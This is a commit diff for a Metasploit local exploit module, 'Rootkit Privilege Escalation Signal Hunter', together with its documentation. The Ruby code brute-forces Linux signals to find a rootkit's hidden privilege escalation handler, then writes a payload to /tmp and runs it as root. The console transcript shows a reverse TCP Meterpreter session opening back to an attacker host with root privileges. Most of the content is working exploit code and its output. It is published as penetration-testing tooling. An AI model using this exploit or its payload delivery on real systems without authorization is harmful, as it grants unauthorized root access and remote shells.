Add Rootkit Privilege Escalation Signal Hunter

bcoles · bcoles · commit 0fbf02b12f4d · 2025-10-24T19:47:42.000+11:00
diff --git a/documentation/modules/exploit/linux/local/rootkit_privesc_signal_hunter.md b/documentation/modules/exploit/linux/local/rootkit_privesc_signal_hunter.md
@@ -1,66 +1,79 @@
 ## Vulnerable Application
 
-  [Diamorphine](https://github.com/m0nad/Diamorphine) is a Linux Kernel Module (LKM) rootkit.
+This module searches for rootkits which use signals to elevate
+process privileges to UID 0 (root).
 
-  This module uses Diamorphine rootkit's privesc feature using signal
-  64 to elevate the privileges of arbitrary processes to UID 0 (root).
+Some rootkits install signal handlers which listen for specific
+signals to elevate process privileges. This module identifies these
+rootkits by sending signals and observing UID switching to root.
 
-  This module has been tested successfully with Diamorphine from `master`
-  branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).
+This module has been tested successfully with:
+
+* [Singularity](https://github.com/MatheuZSecurity/Singularity) 5b6c4b6 (2025-10-19) on Ubuntu 24.04 kernel 6.14.0-33-generic (x64)
+* [Diamorphine](https://github.com/m0nad/Diamorphine) 2337293 (2023-09-20) on Ubuntu 22.04 kernel 5.19.0-38-generic (x64)
 
 
 ## Verification Steps
 
-  1. Start `msfconsole`
-  2. Get a session
-  3. `use exploit/linux/local/diamorphine_rootkit_signal_priv_esc`
-  4. `set SESSION [SESSION]`
-  5. `check`
-  6. `run`
-  7. You should get a new *root* session
+1. Start `msfconsole`
+2. Get a session
+3. `use exploit/linux/local/rootkit_privesc_signal_hunter`
+4. `set SESSION [SESSION]`
+5. `set PAYLOAD [PAYLOAD]`
+6. `check`
+7. `run`
+8. You should get a new *root* session
 
 
 ## Options
 
-  **SIGNAL**
 
-  Diamorphine elevate signal. (default: `64`)
+### MIN_SIGNAL
 
+Start at signal (default: `0`)
 
-## Scenarios
+### MAX_SIGNAL
+
+Stop at signal (default: `64`)
+
+### PID
 
-### Linux Mint 19 (x64)
-
-  ```
-  msf > use exploit/linux/local/diamorphine_rootkit_signal_priv_esc
-  msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set session 1
-  session => 1
-  msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set verbose true
-  verbose => true
-  msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > check
-
-  [*] Executing id ...
-  uid=0(root) gid=0(root) groups=0(root),1001(test)
-  [+] The target is vulnerable. Diamorphine is installed and configured to handle signal '64'.
-  msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > run
-
-  [*] Started reverse TCP handler on 172.16.191.165:4444 
-  [*] Executing id ...
-  uid=0(root) gid=0(root) groups=0(root),1001(test)
-  [*] Writing '/tmp/.hwL5UoDL6mfZ' (207 bytes) ...
-  [*] Executing /tmp/.hwL5UoDL6mfZ & echo  ...
-  [*] Transmitting intermediate stager...(106 bytes)
-  [*] Sending stage (985320 bytes) to 172.16.191.228
-  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.228:47694) at 2020-02-16 09:28:59 -0500
-
-  meterpreter > getuid
-  Server username: uid=0, gid=0, euid=0, egid=0
-  meterpreter > sysinfo
-  Computer     : 172.16.191.228
-  OS           : LinuxMint 19 (Linux 4.15.0-20-generic)
-  Architecture : x64
-  BuildTuple   : i486-linux-musl
-  Meterpreter  : x86/linux
-  meterpreter >
-  ```
+Process ID to send signals to ("new" to spawn a new process) (default: `new`)
+
+
+## Scenarios
 
+### Singularity 5b6c4b6 (2025-10-19) on Ubuntu 24.04 kernel 6.14.0-33-generic (x64)
+
+```
+msf > use exploit/linux/local/rootkit_privesc_signal_hunter
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf exploit(linux/local/rootkit_privesc_signal_hunter) > set session -1
+session => -1
+msf exploit(linux/local/rootkit_privesc_signal_hunter) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf exploit(linux/local/rootkit_privesc_signal_hunter) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf exploit(linux/local/rootkit_privesc_signal_hunter) > set lport 4444
+lport => 4444
+msf exploit(linux/local/rootkit_privesc_signal_hunter) > check
+[+] The target is vulnerable. Rootkit(s) are installed and configured to elevate privileges for signals.
+msf exploit(linux/local/rootkit_privesc_signal_hunter) > run
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+[*] Trying signals 0 to 64 (PID: $$) ...
+[+] Found 1 signals for privilege escalation (59).
+[*] Writing '/tmp/.9Z5PXuL7yw' (250 bytes) ...
+[*] Trying signal 59 ...
+[*] Sending stage (3090404 bytes) to 192.168.200.139
+[+] Deleted /tmp/.9Z5PXuL7yw
+[*] Meterpreter session 2 opened (192.168.200.130:4444 -> 192.168.200.139:41588) at 2025-10-23 11:18:25 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo 
+Computer     : 192.168.200.139
+OS           : Ubuntu 24.04 (Linux 6.14.0-33-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
diff --git a/modules/exploits/linux/local/rootkit_privesc_signal_hunter.rb b/modules/exploits/linux/local/rootkit_privesc_signal_hunter.rb
@@ -4,105 +4,181 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Local
-  Rank = ExcellentRanking
+  Rank = GreatRanking
 
   include Msf::Post::File
   include Msf::Post::Linux::Priv
   include Msf::Post::Linux::System
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
-  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Deprecated
+
+  moved_from 'exploit/linux/local/diamorphine_rootkit_signal_priv_esc'
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'Diamorphine Rootkit Signal Privilege Escalation',
+        'Name' => 'Rootkit Privilege Escalation Signal Hunter',
         'Description' => %q{
-          This module uses Diamorphine rootkit's privesc feature using signal
-          64 to elevate the privileges of arbitrary processes to UID 0 (root).
+          This module searches for rootkits which use signals to elevate
+          process privileges to UID 0 (root).
+
+          Some rootkits install signal handlers which listen for specific
+          signals to elevate process privileges. This module identifies these
+          rootkits by sending signals and observing UID switching to root.
+
+          This module has been tested successfully with:
 
-          This module has been tested successfully with Diamorphine from `master`
-          branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).
+          Singularity 5b6c4b6 (2025-10-19) on Ubuntu 24.04
+          kernel 6.14.0-33-generic (x64);
+          Diamorphine 2337293 (2023-09-20) on Ubuntu 22.04
+          kernel 5.19.0-38-generic (x64).
         },
         'License' => MSF_LICENSE,
-        'Author' => [
-          'm0nad', # Diamorphine
-          'bcoles' # Metasploit
-        ],
+        'Author' => 'bcoles',
+        # Diamorphine rootkit first publicly documented use of signals for process privesc?
         'DisclosureDate' => '2013-11-07', # Diamorphine first public commit
         'References' => [
-          ['URL', 'https://github.com/m0nad/Diamorphine']
+          ['URL', 'https://github.com/bcoles/rootkit-signal-hunter'],
+          ['URL', 'https://xcellerator.github.io/posts/linux_rootkits_03/'],
+          ['URL', 'https://github.com/m0nad/Diamorphine'],
+          ['URL', 'https://github.com/h3xduck/Umbra'],
+          ['URL', 'https://github.com/MatheuZSecurity/Singularity'],
+          ['URL', 'https://github.com/Asekon/RootKit'],
         ],
         'Platform' => ['linux'],
-        'Arch' => [ARCH_X86, ARCH_X64],
+        'Arch' => [
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_RISCV64LE,
+          ARCH_RISCV32LE,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
         'SessionTypes' => ['shell', 'meterpreter'],
         'Targets' => [['Auto', {}]],
         'Notes' => {
           'Reliability' => [ REPEATABLE_SESSION ],
-          'Stability' => [ CRASH_SAFE ],
-          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+          'Stability' => [
+            CRASH_OS_DOWN,    # Poorly designed rootkits may crash
+          ],
+          'SideEffects' => [
+            ARTIFACTS_ON_DISK,
+            SCREEN_EFFECTS,   # Killing processes may spawn crash handler windows
+          ]
         },
+        'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
         'DefaultTarget' => 0
       )
     )
-    register_options [
-      OptInt.new('SIGNAL', [true, 'Diamorphine elevate signal', 64])
-    ]
-    register_advanced_options [
+    register_options([
+      OptInt.new('MIN_SIGNAL', [true, 'Start at signal', 0]),
+      OptInt.new('MAX_SIGNAL', [true, 'Stop at signal', 64]),
+      OptString.new('PID', [true, 'Process ID to send signals to ("new" to spawn a new process)', 'new'])
+    ])
+    register_advanced_options([
       OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
-    ]
-  end
-
-  def signal
-    datastore['SIGNAL'].to_s
+    ])
   end
 
   def base_dir
     datastore['WritableDir'].to_s
   end
 
-  def upload_and_chmodx(path, data)
-    print_status "Writing '#{path}' (#{data.size} bytes) ..."
-    write_file path, data
-    chmod path, 0755
-  end
+  def cmd_exec_elevated(signal, cmd, pid)
+    vprint_status("Executing '#{cmd}' with signal #{signal} (PID: #{pid}) ...")
+
+    # NOTE: cleanup of hung processes will fail on non-POSIX shells (ie, fish)
+    # due to using "$!" which is not supported
+    res = cmd_exec(
+      %(sh -c 'kill -#{signal} #{pid}; #{cmd}' 2>/dev/null & pid=$!; sleep 0.1; kill -CONT "$pid" 2>/dev/null; wait "$pid"),
+      nil,
+      5
+    ).to_s
+    vprint_line(res) unless res.blank?
 
-  def cmd_exec_elevated(cmd)
-    vprint_status "Executing #{cmd} ..."
-    res = cmd_exec("sh -c 'kill -#{signal} $$ && #{cmd}'").to_s
-    vprint_line res unless res.blank?
     res
   end
 
   def check
-    res = cmd_exec_elevated 'id'
+    return CheckCode::Unknown('Session already has root privileges') if is_root?
+
+    # NOTE: this will fail on non-POSIX shells (ie, fish)
+    # due to using "$$" which is not supported
+    pid = datastore['PID'].downcase == 'new' ? '\$$' : datastore['PID']
+
+    # Iterate from MIN to MAX sending each signal to PID.
+    #
+    # SIGCONT if the process hangs.
+    # Note: cleanup of hung processes will fail on non-POSIX shells (ie, fish)
+    # due to using "$!" which is not supported
+    cmd = [
+      "i=#{datastore['MIN_SIGNAL']}",
+      %(while [ "$i" -le #{datastore['MAX_SIGNAL']} ]),
+      %(do sh -c "kill -$i #{pid}; id" 2>/dev/null & pid=$!),
+      'sleep 0.1; kill -CONT "$pid" 2>/dev/null',
+      'wait "$pid"',
+      'i=$((i + 1))',
+      'done 2>/dev/null'
+    ].join('; ')
+
+    res = cmd_exec(
+      cmd,
+      nil,
+      60
+    )
+    vprint_line(res) unless res.blank?
 
-    if res.include?('invalid signal')
-      return CheckCode::Safe("Signal '#{signal}' is invalid")
-    end
+    return CheckCode::Safe('No rootkits detected') unless res.to_s.include?('uid=0')
+
+    CheckCode::Vulnerable('Rootkit(s) are installed and configured to elevate privileges for signals.')
+  end
 
-    unless res.include?('uid=0')
-      return CheckCode::Safe("Diamorphine is not installed, or incorrect signal '#{signal}'")
+  # @return Array of signals which can be used to elevate privileges to root
+  def brute_signals(min, max, pid)
+    print_status("Trying signals #{min} to #{max} (PID: #{pid}) ...")
+    signals = []
+
+    (min..max).each do |signal|
+      signals << signal if cmd_exec_elevated(signal, 'id', pid).to_s.include?('uid=0')
     end
 
-    CheckCode::Vulnerable("Diamorphine is installed and configured to handle signal '#{signal}'.")
+    signals
   end
 
   def exploit
-    if !datastore['ForceExploit'] && is_root?
-      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
-    end
+    fail_with(Failure::BadConfig, 'Session already has root privileges.') if is_root?
+    fail_with(Failure::BadConfig, "Start signal (#{datastore['MIN_SIGNAL']}) is greater than stop signal (#{datastore['MAX_SIGNAL']}); nothing to iterate.") if datastore['MIN_SIGNAL'] > datastore['MAX_SIGNAL']
+    fail_with(Failure::BadConfig, "#{base_dir} is not writable") unless writable?(base_dir)
+
+    pid = datastore['PID'].downcase == 'new' ? '$$' : datastore['PID']
+    signals = brute_signals(
+      datastore['MIN_SIGNAL'],
+      datastore['MAX_SIGNAL'],
+      pid
+    )
 
-    unless writable? base_dir
-      fail_with Failure::BadConfig, "#{base_dir} is not writable"
-    end
+    fail_with(Failure::NotVulnerable, 'No rootkits detected') if signals.blank?
 
-    payload_name = ".#{rand_text_alphanumeric 8..12}"
-    payload_path = "#{base_dir}/#{payload_name}"
-    upload_and_chmodx payload_path, generate_payload_exe
-    register_file_for_cleanup payload_path
+    print_good("Found #{signals.size} signals for privilege escalation (#{signals.join(', ')}).")
 
-    cmd_exec_elevated "#{payload_path} & echo "
+    payload_name = ".#{rand_text_alphanumeric(8..12)}"
+    payload_path = "#{base_dir}/#{payload_name}"
+    payload_data = generate_payload_exe
+    print_status("Writing '#{payload_path}' (#{payload_data.size} bytes) ...")
+    write_file(payload_path, payload_data)
+    chmod(payload_path, 0o755)
+    register_file_for_cleanup(payload_path)
+
+    signals.each do |signal|
+      print_status("Trying signal #{signal} ...")
+      cmd_exec_elevated(signal, "#{payload_path} & echo ", pid)
+      sleep(5)
+      break if session_created?
+    end
   end
 end
